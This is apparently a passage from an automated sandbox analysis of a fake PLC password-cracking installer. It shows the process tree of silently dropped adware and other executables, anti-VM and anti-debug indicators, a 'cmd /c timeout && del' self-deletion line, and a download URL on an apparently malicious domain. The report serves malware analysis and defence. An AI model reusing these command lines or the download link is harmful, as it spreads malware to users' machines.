sPc0vDiz.exedescription pid process Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe Token: SeDebugPrivilege 1204 sPc0vDiz.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
msedge.exe905u0rYnoRp85vL3.tmpy6OyeWm2.tmpvpn.tmppid process 3772 msedge.exe 3772 msedge.exe 4128 905u0rYnoRp85vL3.tmp 4032 y6OyeWm2.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp 1956 vpn.tmp -
Suspicious use of SendNotifyMessage 37 IoCs
Processes:
Adblock.exetaskmgr.exepid process 4860 Adblock.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe 1516 taskmgr.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
sPc0vDiz.exeAdblock.exeMaskVPNUpdate.exepid process 1204 sPc0vDiz.exe 4860 Adblock.exe 4860 Adblock.exe 4860 Adblock.exe 4860 Adblock.exe 3660 MaskVPNUpdate.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
plc-password-setup-t_rCqyQfiI.exeis-G18US.tmpAdw.exemsedge.exedescription pid process target process PID 4272 wrote to memory of 4928 4272 plc-password-setup-t_rCqyQfiI.exe is-G18US.tmp PID 4272 wrote to memory of 4928 4272 plc-password-setup-t_rCqyQfiI.exe is-G18US.tmp PID 4272 wrote to memory of 4928 4272 plc-password-setup-t_rCqyQfiI.exe is-G18US.tmp PID 4928 wrote to memory of 4208 4928 is-G18US.tmp schtasks.exe PID 4928 wrote to memory of 4208 4928 is-G18US.tmp schtasks.exe PID 4928 wrote to memory of 4208 4928 is-G18US.tmp schtasks.exe PID 4928 wrote to memory of 4264 4928 is-G18US.tmp Adw.exe PID 4928 wrote to memory of 4264 4928 is-G18US.tmp Adw.exe PID 4928 wrote to memory of 4264 4928 is-G18US.tmp Adw.exe PID 4928 wrote to memory of 4580 4928 is-G18US.tmp schtasks.exe PID 4928 wrote to memory of 4580 4928 is-G18US.tmp schtasks.exe PID 4928 wrote to memory of 4580 4928 is-G18US.tmp schtasks.exe PID 4928 wrote to memory of 4492 4928 is-G18US.tmp Adw.exe PID 4928 wrote to memory of 4492 4928 is-G18US.tmp Adw.exe PID 4928 wrote to memory of 4492 4928 is-G18US.tmp Adw.exe PID 4492 wrote to memory of 3772 4492 Adw.exe msedge.exe PID 4492 wrote to memory of 3772 4492 Adw.exe msedge.exe PID 3772 wrote to memory of 2920 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 2920 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 1284 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 4420 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 4420 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 4668 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 4668 3772 msedge.exe msedge.exe PID 3772 wrote to memory of 4668 3772 msedge.exe msedge.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\plc-password-setup-t_rCqyQfiI.exe"C:\Users\Admin\AppData\Local\Temp\plc-password-setup-t_rCqyQfiI.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4272 -
C:\Users\Admin\AppData\Local\Temp\is-DFE9O.tmp\is-G18US.tmp"C:\Users\Admin\AppData\Local\Temp\is-DFE9O.tmp\is-G18US.tmp" /SL4 $8003E "C:\Users\Admin\AppData\Local\Temp\plc-password-setup-t_rCqyQfiI.exe" 6191787 4203522⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4928 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Query3⤵PID:4208
-
C:\Program Files (x86)\Novativy Solutions\Advanced Disk Cleaner\Adw.exe"C:\Program Files (x86)\Novativy Solutions\Advanced Disk Cleaner\Adw.exe"3⤵
- Executes dropped EXE
PID:4264 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 10124⤵
- Program crash
PID:3188 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 10364⤵
- Program crash
PID:3580 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 12164⤵
- Program crash
PID:2432 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 1404⤵
- Program crash
PID:3480 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Adw 6.0.2.1"3⤵PID:4580
-
C:\Program Files (x86)\Novativy Solutions\Advanced Disk Cleaner\Adw.exe"C:\Program Files (x86)\Novativy Solutions\Advanced Disk Cleaner\Adw.exe" e7893e073614e30c5434c456745a8b563⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4492 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 9964⤵
- Program crash
PID:1076 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 10044⤵
- Program crash
PID:4192 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 10084⤵
- Program crash
PID:2508 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 12044⤵
- Program crash
PID:1248 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 12124⤵
- Program crash
PID:3476 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 12964⤵
- Program crash
PID:2364 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 13004⤵
- Program crash
PID:4240 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 13844⤵
- Program crash
PID:2404 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 13924⤵
- Program crash
PID:4332 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 13844⤵
- Program crash
PID:3420 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 11164⤵
- Program crash
PID:4760 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 13484⤵
- Program crash
PID:2880 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 15284⤵
- Program crash
PID:1268 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 13524⤵
- Program crash
PID:1840 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 16324⤵
- Program crash
PID:4556 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 18724⤵
- Program crash
PID:1336 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://totrakto.com/plc-password-crack-tool-free-download.zip4⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3772 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ff9180746f8,0x7ff918074708,0x7ff9180747185⤵PID:2920
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2220,1809730444660881173,17945560142004858277,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2232 /prefetch:25⤵PID:1284
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2220,1809730444660881173,17945560142004858277,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:4420 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2220,1809730444660881173,17945560142004858277,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2652 /prefetch:85⤵PID:4668
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1809730444660881173,17945560142004858277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3988 /prefetch:15⤵PID:1620
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1809730444660881173,17945560142004858277,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3996 /prefetch:15⤵PID:4188
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2220,1809730444660881173,17945560142004858277,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5260 /prefetch:85⤵PID:740
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2220,1809730444660881173,17945560142004858277,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5320 /prefetch:85⤵PID:3716
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1809730444660881173,17945560142004858277,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:15⤵PID:1252
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,1809730444660881173,17945560142004858277,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:15⤵PID:1096
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2220,1809730444660881173,17945560142004858277,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3296 /prefetch:85⤵PID:744
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings5⤵
- Drops file in Program Files directory
PID:1832 -
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff785ed5460,0x7ff785ed5470,0x7ff785ed54806⤵PID:4372
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2220,1809730444660881173,17945560142004858277,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3296 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
PID:1316 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 15084⤵
- Program crash
PID:3404 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 15524⤵
- Program crash
PID:2892 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 16084⤵
- Program crash
PID:4432 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 16764⤵
- Program crash
PID:4584 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 16724⤵
- Program crash
PID:1488 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 15364⤵
- Program crash
PID:2240 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 18084⤵
- Program crash
PID:3476 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 19244⤵
- Program crash
PID:1892 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 18724⤵
- Program crash
PID:1360 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 19844⤵
- Program crash
PID:4760 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 19644⤵
- Program crash
PID:2156 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 19924⤵
- Program crash
PID:1628 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 19884⤵
- Program crash
PID:4824 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 19724⤵
- Program crash
PID:4032 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 19644⤵
- Program crash
PID:3788 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 19884⤵
- Program crash
PID:1696 -
C:\Users\Admin\AppData\Local\Temp\1JB7xK9f\905u0rYnoRp85vL3.exeC:\Users\Admin\AppData\Local\Temp\1JB7xK9f\905u0rYnoRp85vL3.exe /VERYSILENT4⤵
- Executes dropped EXE
PID:4688 -
C:\Users\Admin\AppData\Local\Temp\is-6Q0I6.tmp\905u0rYnoRp85vL3.tmp"C:\Users\Admin\AppData\Local\Temp\is-6Q0I6.tmp\905u0rYnoRp85vL3.tmp" /SL5="$6027C,4843834,780800,C:\Users\Admin\AppData\Local\Temp\1JB7xK9f\905u0rYnoRp85vL3.exe" /VERYSILENT5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:4128 -
C:\Program Files (x86)\Proxy2Service\client.exe"C:\Program Files (x86)\Proxy2Service\client.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:1580 -
C:\Users\Admin\AppData\Local\Temp\m3nUjKTQ\sPc0vDiz.exeC:\Users\Admin\AppData\Local\Temp\m3nUjKTQ\sPc0vDiz.exe4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1204 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 20964⤵
- Program crash
PID:3776 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 21604⤵
- Program crash
PID:3104 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 22044⤵
- Program crash
PID:1856 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 21044⤵
- Program crash
PID:4880 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 22084⤵
- Program crash
PID:4968 -
C:\Users\Admin\AppData\Local\Temp\1wcBu1A2\WFOiZtxlH5En8g90.exeC:\Users\Admin\AppData\Local\Temp\1wcBu1A2\WFOiZtxlH5En8g90.exe /silentmix SUB=e7893e073614e30c5434c456745a8b564⤵
- Executes dropped EXE
PID:2960 -
C:\Users\Admin\AppData\Local\Temp\is-JOSH9.tmp\is-ROOK1.tmp"C:\Users\Admin\AppData\Local\Temp\is-JOSH9.tmp\is-ROOK1.tmp" /SL4 $B027A "C:\Users\Admin\AppData\Local\Temp\1wcBu1A2\WFOiZtxlH5En8g90.exe" 5765103 52736 /silentmix SUB=e7893e073614e30c5434c456745a8b565⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:4828 -
C:\Program Files (x86)\agSearcher\nsearcher.exe"C:\Program Files (x86)\agSearcher\nsearcher.exe" /silentmix SUB=e7893e073614e30c5434c456745a8b566⤵
- Executes dropped EXE
- Checks computer location settings
PID:4644 -
C:\Users\Admin\AppData\Roaming\7INVNY\ZZBe6j.exe"C:\Users\Admin\AppData\Roaming\7INVNY\ZZBe6j.exe"7⤵
- Executes dropped EXE
PID:4580 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 10448⤵
- Program crash
PID:3260 -
C:\Users\Admin\AppData\Roaming\zmjsXew1J6K\AewupLCiG.exe"C:\Users\Admin\AppData\Roaming\zmjsXew1J6K\AewupLCiG.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
PID:4384 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Roaming\3CB09A926058773E\tomtit.exe8⤵PID:4140
-
C:\Users\Admin\AppData\Roaming\3CB09A926058773E\tomtit.exeC:\Users\Admin\AppData\Roaming\3CB09A926058773E\tomtit.exe9⤵PID:4788
-
C:\Users\Admin\AppData\Roaming\NCH Software\DrawPad\DpEditor.exe"C:\Users\Admin\AppData\Roaming\NCH Software\DrawPad\DpEditor.exe"10⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: AddClipboardFormatListener
PID:3716 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout -t 3 && del "C:\Users\Admin\AppData\Roaming\zmjsXew1J6K\AewupLCiG.exe"8⤵PID:700
-
C:\Windows\SysWOW64\timeout.exetimeout -t 39⤵
- Delays execution with timeout.exe
PID:4752 -
C:\Users\Admin\AppData\Roaming\FGVh2Xti\Tryam.exe"C:\Users\Admin\AppData\Roaming\FGVh2Xti\Tryam.exe"7⤵PID:1096
-
C:\Users\Admin\AppData\Roaming\shftools\strongix.exestrongix.exe8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3316 -
C:\Users\Admin\AppData\Roaming\shftools\strongix.exe"C:\Users\Admin\AppData\Roaming\shftools\strongix.exe"9⤵
- Executes dropped EXE
